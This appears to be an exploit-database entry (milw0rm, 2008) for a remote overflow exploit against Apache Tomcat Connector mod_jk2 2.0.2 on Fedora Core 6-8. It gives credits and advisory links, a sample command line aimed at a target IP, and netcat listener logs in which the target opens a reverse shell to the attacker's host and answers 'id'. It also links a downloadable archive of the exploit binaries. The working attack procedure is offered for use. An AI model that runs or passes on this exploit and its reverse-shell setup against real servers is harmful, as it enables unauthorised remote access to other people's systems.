57 lines
No EOL
1.6 KiB
Text
57 lines
No EOL
1.6 KiB
Text
/*
|
|
**
|
|
** Fedora Core 6,7,8 (exec-shield) based
|
|
** Apache Tomcat Connector jk2-2.0.2(mod_jk2) remote overflow exploit
|
|
** by INetCop Security
|
|
**
|
|
** Advanced exploitation in exec-shield (Fedora Core case study)
|
|
** URL: http://www.milw0rm.com/papers/151
|
|
**
|
|
** IOActive Security Advisory:
|
|
** http://www.securityfocus.com/archive/1/487983
|
|
**
|
|
** Heretic2(heretic2x@gmail.com)'s exploit (Win32):
|
|
** http://www.milw0rm.com/exploits/5330
|
|
**
|
|
** --
|
|
** exploit by INetCop Security.
|
|
*/
|
|
/*
|
|
** --
|
|
** $ ./0x82-apache-mod_jk2 61.xx.xx.20 80 61.xx.xx.30
|
|
**
|
|
** Fedora Core release 6 (exec-shield) based
|
|
** Apache Tomcat Connector (mod_jk2) remote overflow exploit
|
|
** Target Version: Apache/2.0.53 (Unix) mod_jk2/2.0.2
|
|
** by INetCop Security
|
|
**
|
|
** + make socket
|
|
** + make exploit payload
|
|
** + try connected 61.42.25.22:80
|
|
** + exploit send!
|
|
** * attacker host, check it up, now! :-D
|
|
**
|
|
** $
|
|
** --
|
|
**
|
|
** attacker's server port 56789: --
|
|
** $ nc -l -p 56789 -vv
|
|
** listening on [any] 56789 ...
|
|
** 61.xx.xx.20: inverse host lookup failed: Unknown host
|
|
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 47576
|
|
** id
|
|
** --
|
|
**
|
|
** attacker's server port 5678: --
|
|
** $ nc -l -p 5678 -vv
|
|
** listening on [any] 5678 ...
|
|
** 61.xx.xx.20: inverse host lookup failed: Unknown host
|
|
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 52452
|
|
** uid=99(nobody) gid=4294967295 groups=4294967295 context=root:system_r:unconfined_t:s0-s0:c0.c1023
|
|
** --
|
|
**
|
|
*/
|
|
|
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5386.tar.gz (2008-x2_fc6f7f8.tar.gz)
|
|
|
|
# milw0rm.com [2008-04-06] |